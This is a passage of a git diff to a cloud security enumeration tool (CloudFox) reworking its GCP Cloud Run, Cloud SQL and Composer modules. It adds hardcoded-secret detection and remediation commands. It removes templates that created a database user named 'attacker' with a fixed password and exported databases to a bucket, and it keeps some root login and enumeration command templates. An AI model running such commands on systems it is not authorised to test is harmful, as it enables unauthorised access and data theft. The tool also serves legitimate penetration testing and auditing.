ref.MountPath, ref.SecretName, job.ProjectID, + ) + } + } + m.LootMap["cloudrun-secret-refs"].Contents += "\n" + } } // ------------------------------ @@ -276,18 +305,22 @@ func (m *CloudRunModule) addJobToLoot(job CloudRunService.JobInfo) { func (m *CloudRunModule) writeOutput(ctx context.Context, logger internal.Logger) { // Services table servicesHeader := []string{ - "Project Name", "Project ID", + "Project Name", "Name", "Region", "URL", "Ingress", "Public", + "Invokers", "Service Account", + "Default SA", "Image", "VPC Access", - "Min/Max Instances", + "Min/Max", + "Env Vars", "Secrets", + "Hardcoded", } var servicesBody [][]string @@ -295,7 +328,19 @@ func (m *CloudRunModule) writeOutput(ctx context.Context, logger internal.Logger // Format public status publicStatus := "No" if svc.IsPublic { - publicStatus = "YES" + publicStatus = "Yes" + } + + // Format default SA status + defaultSA := "No" + if svc.UsesDefaultSA { + defaultSA = "Yes" + } + + // Format invokers + invokers := "-" + if len(svc.InvokerMembers) > 0 { + invokers = strings.Join(svc.InvokerMembers, ", ") } // Format VPC access @@ -310,51 +355,76 @@ func (m *CloudRunModule) writeOutput(ctx context.Context, logger internal.Logger // Format scaling scaling := fmt.Sprintf("%d/%d", svc.MinInstances, svc.MaxInstances) - // Format secrets count + // Format env var count + envVars := "-" + if svc.EnvVarCount > 0 { + envVars = fmt.Sprintf("%d", svc.EnvVarCount) + } + + // Format secrets count (Secret Manager references) secretCount := svc.SecretEnvVarCount + svc.SecretVolumeCount secrets := "-" if secretCount > 0 { secrets = fmt.Sprintf("%d", secretCount) } - // Format image (truncate registry prefix for readability) - image := truncateImage(svc.ContainerImage) - - // Format service account (truncate for readability) - saDisplay := truncateSA(svc.ServiceAccount) + // Format hardcoded secrets count + hardcoded := "No" + if len(svc.HardcodedSecrets) > 0 { + hardcoded = fmt.Sprintf("Yes (%d)", len(svc.HardcodedSecrets)) + } servicesBody = append(servicesBody, []string{ - m.GetProjectName(svc.ProjectID), svc.ProjectID, + m.GetProjectName(svc.ProjectID), svc.Name, svc.Region, svc.URL, formatIngress(svc.IngressSettings), publicStatus, - saDisplay, - image, + invokers, + svc.ServiceAccount, + defaultSA, + svc.ContainerImage, vpcAccess, scaling, + envVars, secrets, + hardcoded, }) } // Jobs table jobsHeader := []string{ - "Project Name", "Project ID", + "Project Name", "Name", "Region", "Service Account", + "Default SA", "Image", "Tasks", "Parallelism", "Last Execution", + "Env Vars", "Secrets", + "Hardcoded", } var jobsBody [][]string for _, job := range m.Jobs { + // Format default SA status + defaultSA := "No" + if job.UsesDefaultSA { + defaultSA = "Yes" + } + + // Format env var count + envVars := "-" + if job.EnvVarCount > 0 { + envVars = fmt.Sprintf("%d", job.EnvVarCount) + } + // Format secrets count secretCount := job.SecretEnvVarCount + job.SecretVolumeCount secrets := "-" @@ -362,11 +432,11 @@ func (m *CloudRunModule) writeOutput(ctx context.Context, logger internal.Logger secrets = fmt.Sprintf("%d", secretCount) } - // Format image - image := truncateImage(job.ContainerImage) - - // Format service account - saDisplay := truncateSA(job.ServiceAccount) + // Format hardcoded secrets count + hardcoded := "No" + if len(job.HardcodedSecrets) > 0 { + hardcoded = fmt.Sprintf("Yes (%d)", len(job.HardcodedSecrets)) + } // Format last execution lastExec := "-" @@ -375,19 +445,67 @@ func (m *CloudRunModule) writeOutput(ctx context.Context, logger internal.Logger } jobsBody = append(jobsBody, []string{ - m.GetProjectName(job.ProjectID), job.ProjectID, + m.GetProjectName(job.ProjectID), job.Name, job.Region, - saDisplay, - image, + job.ServiceAccount, + defaultSA, + job.ContainerImage, fmt.Sprintf("%d", job.TaskCount), fmt.Sprintf("%d", job.Parallelism), lastExec, + envVars, secrets, + hardcoded, }) } + // Hardcoded secrets table + secretsHeader := []string{ + "Project ID", + "Project Name", + "Resource Type", + "Name", + "Region", + "Env Var", + "Secret Type", + } + + var secretsBody [][]string + // Add service secrets + for _, svc := range m.Services { + for _, secret := range svc.HardcodedSecrets { + secretsBody = append(secretsBody, []string{ + svc.ProjectID, + m.GetProjectName(svc.ProjectID), + "Service", + svc.Name, + svc.Region, + secret.EnvVarName, + secret.SecretType, + }) + // Add remediation to loot + m.addSecretRemediationToLoot(svc.Name, svc.ProjectID, svc.Region, secret.EnvVarName, "service") + } + } + // Add job secrets + for _, job := range m.Jobs { + for _, secret := range job.HardcodedSecrets { + secretsBody = append(secretsBody, []string{ + job.ProjectID, + m.GetProjectName(job.ProjectID), + "Job", + job.Name, + job.Region, + secret.EnvVarName, + secret.SecretType, + }) + // Add remediation to loot + m.addSecretRemediationToLoot(job.Name, job.ProjectID, job.Region, secret.EnvVarName, "job") + } + } + // Collect loot files var lootFiles []internal.LootFile for _, loot := range m.LootMap { @@ -415,6 +533,14 @@ func (m *CloudRunModule) writeOutput(ctx context.Context, logger internal.Logger }) } + if len(secretsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_CLOUDRUN_MODULE_NAME + "-secrets", + Header: secretsHeader, + Body: secretsBody, + }) + } + output := CloudRunOutput{ Table: tableFiles, Loot: lootFiles, @@ -459,47 +585,6 @@ func formatIngress(ingress string) string { } } -// truncateImage truncates container image for readability -func truncateImage(image string) string { - // Remove common registry prefixes - prefixes := []string{ - "gcr.io/", - "us-docker.pkg.dev/", - "us-central1-docker.pkg.dev/", - "europe-docker.pkg.dev/", - "asia-docker.pkg.dev/", - } - - for _, prefix := range prefixes { - if strings.HasPrefix(image, prefix) { - image = strings.TrimPrefix(image, prefix) - break - } - } - - // Truncate if still too long - if len(image) > 50 { - return image[:47] + "..." - } - return image -} - -// truncateSA truncates service account email for readability -func truncateSA(sa string) string { - if len(sa) > 40 { - // Show name part only - if idx := strings.Index(sa, "@"); idx > 0 { - name := sa[:idx] - if len(name) > 30 { - return name[:27] + "...@..." - } - return name + "@..." - } - return sa[:37] + "..." - } - return sa -} - // extractName extracts just the name from a resource path func extractName(fullName string) string { parts := strings.Split(fullName, "/") @@ -508,3 +593,36 @@ func extractName(fullName string) string { } return fullName } + +// addSecretRemediationToLoot adds remediation commands for hardcoded secrets +func (m *CloudRunModule) addSecretRemediationToLoot(resourceName, projectID, region, envVarName, resourceType string) { + secretName := strings.ToLower(strings.ReplaceAll(envVarName, "_", "-")) + + m.mu.Lock() + defer m.mu.Unlock() + + m.LootMap["cloudrun-commands"].Contents += fmt.Sprintf( + "# CRITICAL: Migrate hardcoded secret %s from %s %s\n"+ + "# 1. Create secret in Secret Manager:\n"+ + "echo -n 'SECRET_VALUE' | gcloud secrets create %s --data-file=- --project=%s\n"+ + "# 2. Grant access to Cloud Run service account:\n"+ + "gcloud secrets add-iam-policy-binding %s --member='serviceAccount:SERVICE_ACCOUNT' --role='roles/secretmanager.secretAccessor' --project=%s\n", + envVarName, resourceType, resourceName, + secretName, projectID, + secretName, projectID, + ) + + if resourceType == "service" { + m.LootMap["cloudrun-commands"].Contents += fmt.Sprintf( + "# 3. Update Cloud Run service to use secret:\n"+ + "gcloud run services update %s --update-secrets=%s=%s:latest --region=%s --project=%s\n\n", + resourceName, envVarName, secretName, region, projectID, + ) + } else { + m.LootMap["cloudrun-commands"].Contents += fmt.Sprintf( + "# 3. Update Cloud Run job to use secret:\n"+ + "gcloud run jobs update %s --update-secrets=%s=%s:latest --region=%s --project=%s\n\n", + resourceName, envVarName, secretName, region, projectID, + ) + } +} diff --git a/gcp/commands/cloudsql.go b/gcp/commands/cloudsql.go index 954868af..68861c87 100644 --- a/gcp/commands/cloudsql.go +++ b/gcp/commands/cloudsql.go @@ -158,307 +158,78 @@ func (m *CloudSQLModule) processProject(ctx context.Context, projectID string, l // Loot File Management // ------------------------------ func (m *CloudSQLModule) initializeLootFiles() { - m.LootMap["cloudsql-gcloud-commands"] = &internal.LootFile{ - Name: "cloudsql-gcloud-commands", - Contents: "# Cloud SQL gcloud Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["cloudsql-connection-strings"] = &internal.LootFile{ - Name: "cloudsql-connection-strings", - Contents: "# Cloud SQL Connection Strings\n# Generated by CloudFox\n# NOTE: You'll need to obtain credentials separately\n\n", - } - m.LootMap["cloudsql-exploitation"] = &internal.LootFile{ - Name: "cloudsql-exploitation", - Contents: "# Cloud SQL Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap["cloudsql-public"] = &internal.LootFile{ - Name: "cloudsql-public", - Contents: "# PUBLIC Cloud SQL Instances\n# Generated by CloudFox\n# These instances have public IP addresses!\n\n", - } - m.LootMap["cloudsql-security-issues"] = &internal.LootFile{ - Name: "cloudsql-security-issues", - Contents: "# Cloud SQL Security Issues Detected\n# Generated by CloudFox\n\n", - } - m.LootMap["cloudsql-backup-commands"] = &internal.LootFile{ - Name: "cloudsql-backup-commands", - Contents: "# Cloud SQL Backup Commands\n# Generated by CloudFox\n# Commands for backup enumeration and restoration\n\n", - } - m.LootMap["cloudsql-security-recommendations"] = &internal.LootFile{ - Name: "cloudsql-security-recommendations", - Contents: "# Cloud SQL Security Recommendations\n# Generated by CloudFox\n# Remediation commands for security issues\n\n", - } - m.LootMap["cloudsql-no-backups"] = &internal.LootFile{ - Name: "cloudsql-no-backups", - Contents: "# Cloud SQL Instances WITHOUT Backups\n# Generated by CloudFox\n# CRITICAL: These instances have no automated backups!\n\n", - } - m.LootMap["cloudsql-weak-encryption"] = &internal.LootFile{ - Name: "cloudsql-weak-encryption", - Contents: "# Cloud SQL Instances Using Google-Managed Encryption\n# Generated by CloudFox\n# Consider using CMEK for compliance requirements\n\n", + m.LootMap["cloudsql-commands"] = &internal.LootFile{ + Name: "cloudsql-commands", + Contents: "# Cloud SQL Details\n# Generated by CloudFox\n\n", } } func (m *CloudSQLModule) addInstanceToLoot(instance CloudSQLService.SQLInstanceInfo) { - // gcloud commands - m.LootMap["cloudsql-gcloud-commands"].Contents += fmt.Sprintf( - "# Instance: %s (Project: %s, Region: %s)\n"+ - "gcloud sql instances describe %s --project=%s\n"+ - "gcloud sql databases list --instance=%s --project=%s\n"+ - "gcloud sql users list --instance=%s --project=%s\n"+ - "gcloud sql ssl-certs list --instance=%s --project=%s\n"+ - "gcloud sql backups list --instance=%s --project=%s\n\n", - instance.Name, instance.ProjectID, instance.Region, - instance.Name, instance.ProjectID, - instance.Name, instance.ProjectID, - instance.Name, instance.ProjectID, - instance.Name, instance.ProjectID, - instance.Name, instance.ProjectID, - ) - - // Connection strings based on database type dbType := getDatabaseType(instance.DatabaseVersion) connectionInstance := fmt.Sprintf("%s:%s:%s", instance.ProjectID, instance.Region, instance.Name) - m.LootMap["cloudsql-connection-strings"].Contents += fmt.Sprintf( - "# Instance: %s (%s)\n"+ - "# Public IP: %s\n"+ - "# Private IP: %s\n"+ - "# Connection Name: %s\n", + publicIP := instance.PublicIP + if publicIP == "" { + publicIP = "-" + } + + m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + "# %s (%s)\n"+ + "# Project: %s | Region: %s\n"+ + "# Public IP: %s\n", instance.Name, instance.DatabaseVersion, - instance.PublicIP, - instance.PrivateIP, - connectionInstance, + instance.ProjectID, instance.Region, + publicIP, ) - switch dbType { - case "mysql": - m.LootMap["cloudsql-connection-strings"].Contents += fmt.Sprintf( - "# MySQL Connection:\n"+ - "mysql -h %s -u root -p\n"+ - "# Cloud SQL Proxy:\n"+ - "cloud_sql_proxy -instances=%s=tcp:3306\n"+ - "mysql -h 127.0.0.1 -u root -p\n\n", - instance.PublicIP, connectionInstance, - ) - case "postgres": - m.LootMap["cloudsql-connection-strings"].Contents += fmt.Sprintf( - "# PostgreSQL Connection:\n"+ - "psql -h %s -U postgres\n"+ - "# Cloud SQL Proxy:\n"+ - "cloud_sql_proxy -instances=%s=tcp:5432\n"+ - "psql -h 127.0.0.1 -U postgres\n\n", - instance.PublicIP, connectionInstance, - ) - case "sqlserver": - m.LootMap["cloudsql-connection-strings"].Contents += fmt.Sprintf( - "# SQL Server Connection:\n"+ - "sqlcmd -S %s -U sqlserver\n"+ - "# Cloud SQL Proxy:\n"+ - "cloud_sql_proxy -instances=%s=tcp:1433\n"+ - "sqlcmd -S 127.0.0.1 -U sqlserver\n\n", - instance.PublicIP, connectionInstance, - ) - } - - // Exploitation commands - m.LootMap["cloudsql-exploitation"].Contents += fmt.Sprintf( - "# Instance: %s (Project: %s)\n"+ - "# Database: %s\n"+ - "# Public IP: %s, Private IP: %s\n"+ - "# SSL Required: %v\n\n"+ - "# Connect via Cloud SQL Proxy (recommended):\n"+ - "cloud_sql_proxy -instances=%s=tcp:3306 &\n\n"+ - "# Create a new user (if you have sql.users.create):\n"+ - "gcloud sql users create attacker --instance=%s --password=AttackerPass123! --project=%s\n\n"+ - "# Export database (if you have sql.instances.export):\n"+ - "gcloud sql export sql %s gs://%s-backup/export.sql --database=mysql --project=%s\n\n", + // gcloud commands + m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + "gcloud sql instances describe %s --project=%s\n"+ + "gcloud sql databases list --instance=%s --project=%s\n"+ + "gcloud sql users list --instance=%s --project=%s\n", + instance.Name, instance.ProjectID, instance.Name, instance.ProjectID, - instance.DatabaseVersion, - instance.PublicIP, instance.PrivateIP, - instance.RequireSSL, - connectionInstance, instance.Name, instance.ProjectID, - instance.Name, instance.ProjectID, instance.ProjectID, ) - // Public instances - if instance.HasPublicIP { - m.LootMap["cloudsql-public"].Contents += fmt.Sprintf( - "# INSTANCE: %s\n"+ - "# Project: %s, Region: %s\n"+ - "# Database: %s\n"+ - "# Public IP: %s\n"+ - "# SSL Required: %v\n"+ - "# Authorized Networks: %d\n", - instance.Name, - instance.ProjectID, instance.Region, - instance.DatabaseVersion, - instance.PublicIP, - instance.RequireSSL, - len(instance.AuthorizedNetworks), - ) - for _, network := range instance.AuthorizedNetworks { - marker := "" - if network.IsPublic { - marker = " [WORLD ACCESSIBLE!]" - } - m.LootMap["cloudsql-public"].Contents += fmt.Sprintf( - "# - %s: %s%s\n", - network.Name, network.Value, marker, + // Connection commands based on database type + switch dbType { + case "mysql": + if instance.PublicIP != "" { + m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + "mysql -h %s -u root -p\n", + instance.PublicIP, ) } - m.LootMap["cloudsql-public"].Contents += "\n" - } - - // Security issues - if len(instance.SecurityIssues) > 0 { - m.LootMap["cloudsql-security-issues"].Contents += fmt.Sprintf( - "# INSTANCE: %s (Project: %s)\n"+ - "# Database: %s\n"+ - "# Issues:\n", - instance.Name, instance.ProjectID, instance.DatabaseVersion, + m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + "cloud_sql_proxy -instances=%s=tcp:3306\n", + connectionInstance, ) - for _, issue := range instance.SecurityIssues { - m.LootMap["cloudsql-security-issues"].Contents += fmt.Sprintf(" - %s\n", issue) + case "postgres": + if instance.PublicIP != "" { + m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + "psql -h %s -U postgres\n", + instance.PublicIP, + ) } - m.LootMap["cloudsql-security-issues"].Contents += "\n" - } - - // Backup commands - m.LootMap["cloudsql-backup-commands"].Contents += fmt.Sprintf( - "# Instance: %s (Project: %s)\n"+ - "# Backup Enabled: %v, PITR: %v, Retention: %d days\n"+ - "gcloud sql backups list --instance=%s --project=%s\n"+ - "gcloud sql backups describe BACKUP_ID --instance=%s --project=%s\n"+ - "# Restore from backup:\n"+ - "# gcloud sql backups restore BACKUP_ID --restore-instance=%s --project=%s\n"+ - "# Point-in-time recovery (if enabled):\n"+ - "# gcloud sql instances clone %s %s-clone --point-in-time='2024-01-01T00:00:00Z' --project=%s\n\n", - instance.Name, instance.ProjectID, - instance.BackupEnabled, instance.PointInTimeRecovery, instance.RetentionDays, - instance.Name, instance.ProjectID, - instance.Name, instance.ProjectID, - instance.Name, instance.ProjectID, - instance.Name, instance.Name, instance.ProjectID, - ) - - // Instances without backups - if !instance.BackupEnabled { - m.LootMap["cloudsql-no-backups"].Contents += fmt.Sprintf( - "# INSTANCE: %s (Project: %s)\n"+ - "# Database: %s, Tier: %s\n"+ - "# CRITICAL: No automated backups configured!\n"+ - "# Enable backups with:\n"+ - "gcloud sql instances patch %s --backup-start-time=02:00 --project=%s\n\n", - instance.Name, instance.ProjectID, - instance.DatabaseVersion, instance.Tier, - instance.Name, instance.ProjectID, + m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + "cloud_sql_proxy -instances=%s=tcp:5432\n", + connectionInstance, ) - } - - // Weak encryption (Google-managed instead of CMEK) - if instance.EncryptionType == "Google-managed" { - m.LootMap["cloudsql-weak-encryption"].Contents += fmt.Sprintf( - "# INSTANCE: %s (Project: %s)\n"+ - "# Database: %s\n"+ - "# Encryption: Google-managed (not CMEK)\n"+ - "# NOTE: CMEK cannot be enabled on existing instances.\n"+ - "# For CMEK, create a new instance with:\n"+ - "# gcloud sql instances create %s-cmek \\\n"+ - "# --database-version=%s \\\n"+ - "# --disk-encryption-key=projects/PROJECT/locations/LOCATION/keyRings/RING/cryptoKeys/KEY \\\n"+ - "# --project=%s\n\n", - instance.Name, instance.ProjectID, - instance.DatabaseVersion, - instance.Name, - instance.DatabaseVersion, - instance.ProjectID, - ) - } - - // Security recommendations - m.addSecurityRecommendations(instance) -} - -// addSecurityRecommendations adds remediation commands for security issues -func (m *CloudSQLModule) addSecurityRecommendations(instance CloudSQLService.SQLInstanceInfo) { - hasRecommendations := false - recommendations := fmt.Sprintf( - "# INSTANCE: %s (Project: %s)\n"+ - "# Database: %s\n", - instance.Name, instance.ProjectID, instance.DatabaseVersion, - ) - - // SSL not required - if !instance.RequireSSL { - hasRecommendations = true - recommendations += fmt.Sprintf( - "# Issue: SSL not required\n"+ - "gcloud sql instances patch %s --require-ssl --project=%s\n\n", - instance.Name, instance.ProjectID, - ) - } - - // Password policy not enabled - if !instance.PasswordPolicyEnabled { - hasRecommendations = true - recommendations += fmt.Sprintf( - "# Issue: Password policy not enabled\n"+ - "gcloud sql instances patch %s \\\n"+ - " --password-policy-min-length=12 \\\n"+ - " --password-policy-complexity=COMPLEXITY_DEFAULT \\\n"+ - " --password-policy-reuse-interval=5 \\\n"+ - " --password-policy-disallow-username-substring \\\n"+ - " --project=%s\n\n", - instance.Name, instance.ProjectID, - ) - } - - // Backups not enabled - if !instance.BackupEnabled { - hasRecommendations = true - recommendations += fmt.Sprintf( - "# Issue: Automated backups not enabled\n"+ - "gcloud sql instances patch %s --backup-start-time=02:00 --project=%s\n\n", - instance.Name, instance.ProjectID, - ) - } - - // Point-in-time recovery not enabled (but backups are) - if instance.BackupEnabled && !instance.PointInTimeRecovery { - hasRecommendations = true - recommendations += fmt.Sprintf( - "# Issue: Point-in-time recovery not enabled\n"+ - "gcloud sql instances patch %s --enable-point-in-time-recovery --project=%s\n\n", - instance.Name, instance.ProjectID, - ) - } - - // Single zone deployment - if instance.AvailabilityType == "ZONAL" { - hasRecommendations = true - recommendations += fmt.Sprintf( - "# Issue: Single zone deployment (no HA)\n"+ - "gcloud sql instances patch %s --availability-type=REGIONAL --project=%s\n\n", - instance.Name, instance.ProjectID, - ) - } - - // Public IP with no SSL - if instance.HasPublicIP && !instance.RequireSSL { - hasRecommendations = true - recommendations += fmt.Sprintf( - "# Issue: Public IP without SSL requirement - HIGH RISK\n"+ - "# Option 1: Require SSL\n"+ - "gcloud sql instances patch %s --require-ssl --project=%s\n"+ - "# Option 2: Disable public IP (use Private IP only)\n"+ - "gcloud sql instances patch %s --no-assign-ip --project=%s\n\n", - instance.Name, instance.ProjectID, - instance.Name, instance.ProjectID, + case "sqlserver": + if instance.PublicIP != "" { + m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + "sqlcmd -S %s -U sqlserver\n", + instance.PublicIP, + ) + } + m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + "cloud_sql_proxy -instances=%s=tcp:1433\n", + connectionInstance, ) } - if hasRecommendations { - m.LootMap["cloudsql-security-recommendations"].Contents += recommendations + "\n" - } + m.LootMap["cloudsql-commands"].Contents += "\n" } // getDatabaseType returns the database type from version string @@ -479,7 +250,7 @@ func getDatabaseType(version string) string { // Output Generation // ------------------------------ func (m *CloudSQLModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Main instances table with enhanced columns + // Single merged table with one row per authorized network header := []string{ "Project Name", "Project ID", @@ -487,205 +258,97 @@ func (m *CloudSQLModule) writeOutput(ctx context.Context, logger internal.Logger "Region", "Database", "Tier", - "State", "Public IP", "Private IP", "SSL", - "Auth Nets", "Backups", "PITR", "Encrypt", "IAM Auth", "PwdPolicy", "HA", - "Issues", + "Auth Network", + "CIDR", + "Public Access", } var body [][]string for _, instance := range m.Instances { - // Format authorized networks count - authNetworks := fmt.Sprintf("%d", len(instance.AuthorizedNetworks)) - hasPublicNetwork := false - for _, network := range instance.AuthorizedNetworks { - if network.IsPublic { - hasPublicNetwork = true - break - } - } - if hasPublicNetwork { - authNetworks += " (PUBLIC!)" - } - - // Format issues - issueDisplay := "-" - if len(instance.SecurityIssues) > 0 { - issueDisplay = fmt.Sprintf("%d issues", len(instance.SecurityIssues)) - } - // Format encryption type encryptionDisplay := instance.EncryptionType - if encryptionDisplay == "" { - encryptionDisplay = "Google" - } else if encryptionDisplay == "Google-managed" { + if encryptionDisplay == "" || encryptionDisplay == "Google-managed" { encryptionDisplay = "Google" } - body = append(body, []string{ - m.GetProjectName(instance.ProjectID), - instance.ProjectID, - instance.Name, - instance.Region, - instance.DatabaseVersion, - instance.Tier, - instance.State, - instance.PublicIP, - instance.PrivateIP, - boolToYesNo(instance.RequireSSL), - authNetworks, - boolToYesNo(instance.BackupEnabled), - boolToYesNo(instance.PointInTimeRecovery), - encryptionDisplay, - boolToYesNo(instance.IAMAuthentication), - boolToYesNo(instance.PasswordPolicyEnabled), - instance.AvailabilityType, - issueDisplay, - }) - } - - // Security issues table - issuesHeader := []string{ - "Instance", - "Project Name", - "Project ID", - "Database", - "Issue", - } - - var issuesBody [][]string - for _, instance := range m.Instances { - for _, issue := range instance.SecurityIssues { - issuesBody = append(issuesBody, []string{ - instance.Name, - m.GetProjectName(instance.ProjectID), - instance.ProjectID, - instance.DatabaseVersion, - issue, - }) + // Format public/private IPs + publicIP := instance.PublicIP + if publicIP == "" { + publicIP = "-" + } + privateIP := instance.PrivateIP + if privateIP == "" { + privateIP = "-" } - } - - // Authorized networks table - networksHeader := []string{ - "Instance", - "Project Name", - "Project ID", - "Network Name", - "CIDR", - "Public Access", - } - var networksBody [][]string - for _, instance := range m.Instances { - for _, network := range instance.AuthorizedNetworks { - publicAccess := "No" - if network.IsPublic { - publicAccess = "YES - WORLD ACCESSIBLE" + // If instance has authorized networks, create one row per network + if len(instance.AuthorizedNetworks) > 0 { + for _, network := range instance.AuthorizedNetworks { + publicAccess := "No" + if network.IsPublic { + publicAccess = "YES - WORLD ACCESSIBLE" + } + + networkName := network.Name + if networkName == "" { + networkName = "-" + } + + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.Region, + instance.DatabaseVersion, + instance.Tier, + publicIP, + privateIP, + boolToYesNo(instance.RequireSSL), + boolToYesNo(instance.BackupEnabled), + boolToYesNo(instance.PointInTimeRecovery), + encryptionDisplay, + boolToYesNo(instance.IAMAuthentication), + boolToYesNo(instance.PasswordPolicyEnabled), + instance.AvailabilityType, + networkName, + network.Value, + publicAccess, + }) } - networksBody = append(networksBody, []string{ - instance.Name, + } else { + // Instance has no authorized networks - single row + body = append(body, []string{ m.GetProjectName(instance.ProjectID), instance.ProjectID, - network.Name, - network.Value, - publicAccess, + instance.Name, + instance.Region, + instance.DatabaseVersion, + instance.Tier, + publicIP, + privateIP, + boolToYesNo(instance.RequireSSL), + boolToYesNo(instance.BackupEnabled), + boolToYesNo(instance.PointInTimeRecovery), + encryptionDisplay, + boolToYesNo(instance.IAMAuthentication), + boolToYesNo(instance.PasswordPolicyEnabled), + instance.AvailabilityType, + "-", + "-", + "-", }) } } - // Backup configuration table - backupHeader := []string{ - "Instance", - "Project Name", - "Project ID", - "Backups", - "PITR", - "Binary Log", - "Retention Days", - "Backup Location", - "Failover Replica", - } - - var backupBody [][]string - for _, instance := range m.Instances { - backupLocation := instance.BackupLocation - if backupLocation == "" { - backupLocation = "Default" - } - failoverReplica := instance.FailoverReplica - if failoverReplica == "" { - failoverReplica = "-" - } - backupBody = append(backupBody, []string{ - instance.Name, - m.GetProjectName(instance.ProjectID), - instance.ProjectID, - boolToYesNo(instance.BackupEnabled), - boolToYesNo(instance.PointInTimeRecovery), - boolToYesNo(instance.BinaryLogEnabled), - fmt.Sprintf("%d", instance.RetentionDays), - backupLocation, - failoverReplica, - }) - } - - // Encryption and security configuration table - securityConfigHeader := []string{ - "Instance", - "Project Name", - "Project ID", - "Encryption", - "KMS Key", - "IAM Auth", - "Pwd Policy", - "SSL Required", - "SSL Mode", - "Maintenance", - } - - var securityConfigBody [][]string - for _, instance := range m.Instances { - kmsKey := instance.KMSKeyName - if kmsKey == "" { - kmsKey = "-" - } else { - // Truncate long key names - parts := strings.Split(kmsKey, "/") - if len(parts) > 0 { - kmsKey = parts[len(parts)-1] - } - } - maintenanceWindow := instance.MaintenanceWindow - if maintenanceWindow == "" { - maintenanceWindow = "Not set" - } - sslMode := instance.SSLMode - if sslMode == "" { - sslMode = "Default" - } - securityConfigBody = append(securityConfigBody, []string{ - instance.Name, - m.GetProjectName(instance.ProjectID), - instance.ProjectID, - instance.EncryptionType, - kmsKey, - boolToYesNo(instance.IAMAuthentication), - boolToYesNo(instance.PasswordPolicyEnabled), - boolToYesNo(instance.RequireSSL), - sslMode, - maintenanceWindow, - }) - } - // Collect loot files var lootFiles []internal.LootFile for _, loot := range m.LootMap { @@ -703,36 +366,6 @@ func (m *CloudSQLModule) writeOutput(ctx context.Context, logger internal.Logger }, } - if len(issuesBody) > 0 { - tableFiles = append(tableFiles, internal.TableFile{ - Name: "cloudsql-security-issues", - Header: issuesHeader, - Body: issuesBody, - }) - } - - if len(networksBody) > 0 { - tableFiles = append(tableFiles, internal.TableFile{ - Name: "cloudsql-authorized-networks", - Header: networksHeader, - Body: networksBody, - }) - } - - // Always add backup table (shows backup gaps) - tableFiles = append(tableFiles, internal.TableFile{ - Name: "cloudsql-backups", - Header: backupHeader, - Body: backupBody, - }) - - // Always add security config table - tableFiles = append(tableFiles, internal.TableFile{ - Name: "cloudsql-security-config", - Header: securityConfigHeader, - Body: securityConfigBody, - }) - output := CloudSQLOutput{ Table: tableFiles, Loot: lootFiles, diff --git a/gcp/commands/compliancedashboard.go b/gcp/commands/compliancedashboard.go index 237743bc..587c3052 100644 --- a/gcp/commands/compliancedashboard.go +++ b/gcp/commands/compliancedashboard.go @@ -24,6 +24,7 @@ const GCP_COMPLIANCEDASHBOARD_MODULE_NAME string = "compliance-dashboard" var GCPComplianceDashboardCommand = &cobra.Command{ Use: GCP_COMPLIANCEDASHBOARD_MODULE_NAME, Aliases: []string{"compliance", "cis", "benchmark"}, + Hidden: true, Short: "Assess regulatory compliance against CIS GCP Benchmarks and security frameworks", Long: `Assess regulatory compliance posture against industry standards and security frameworks. @@ -1676,11 +1677,11 @@ func (m *ComplianceDashboardModule) writeOutput(ctx context.Context, logger inte } controlsBody = append(controlsBody, []string{ c.ControlID, - truncateString(c.ControlName, 50), + c.ControlName, c.Framework, c.Severity, c.Status, - truncateString(details, 40), + details, }) } @@ -1700,7 +1701,7 @@ func (m *ComplianceDashboardModule) writeOutput(ctx context.Context, logger inte failuresBody = append(failuresBody, []string{ f.ControlID, f.Severity, - truncateString(f.ResourceName, 50), + f.ResourceName, f.ResourceType, m.GetProjectName(f.ProjectID), f.ProjectID, diff --git a/gcp/commands/composer.go b/gcp/commands/composer.go index 7f32eaf8..37305daf 100644 --- a/gcp/commands/composer.go +++ b/gcp/commands/composer.go @@ -106,69 +106,96 @@ func (m *ComposerModule) processProject(ctx context.Context, projectID string, l } func (m *ComposerModule) initializeLootFiles() { - m.LootMap["composer-environments"] = &internal.LootFile{ - Name: "composer-environments", - Contents: "# Composer Environments\n# Generated by CloudFox\n\n", - } - m.LootMap["composer-airflow-urls"] = &internal.LootFile{ - Name: "composer-airflow-urls", - Contents: "", - } - m.LootMap["composer-dag-buckets"] = &internal.LootFile{ - Name: "composer-dag-buckets", - Contents: "", + m.LootMap["composer-commands"] = &internal.LootFile{ + Name: "composer-commands", + Contents: "# Composer Commands\n# Generated by CloudFox\n\n", } } func (m *ComposerModule) addToLoot(env composerservice.EnvironmentInfo) { - m.LootMap["composer-environments"].Contents += fmt.Sprintf( - "# Environment: %s\n# State: %s\n# Service Account: %s\n# Private: %v\n# Airflow URI: %s\n\n", - env.Name, env.State, env.ServiceAccount, env.PrivateEnvironment, env.AirflowURI) + m.LootMap["composer-commands"].Contents += fmt.Sprintf( + "# %s (%s)\n"+ + "# Project: %s\n", + env.Name, env.Location, + env.ProjectID, + ) + + // gcloud commands + m.LootMap["composer-commands"].Contents += fmt.Sprintf( + "gcloud composer environments describe %s --location=%s --project=%s\n"+ + "gcloud composer environments run %s --location=%s --project=%s dags list\n", + env.Name, env.Location, env.ProjectID, + env.Name, env.Location, env.ProjectID, + ) + + // DAG bucket command + if env.DagGcsPrefix != "" { + m.LootMap["composer-commands"].Contents += fmt.Sprintf( + "gsutil ls %s\n", + env.DagGcsPrefix, + ) + } + // Airflow Web UI if env.AirflowURI != "" { - m.LootMap["composer-airflow-urls"].Contents += env.AirflowURI + "\n" + m.LootMap["composer-commands"].Contents += fmt.Sprintf( + "# Airflow Web UI: %s\n", + env.AirflowURI, + ) } - if env.DagGcsPrefix != "" { - m.LootMap["composer-dag-buckets"].Contents += env.DagGcsPrefix + "\n" - } + m.LootMap["composer-commands"].Contents += "\n" } func (m *ComposerModule) writeOutput(ctx context.Context, logger internal.Logger) { header 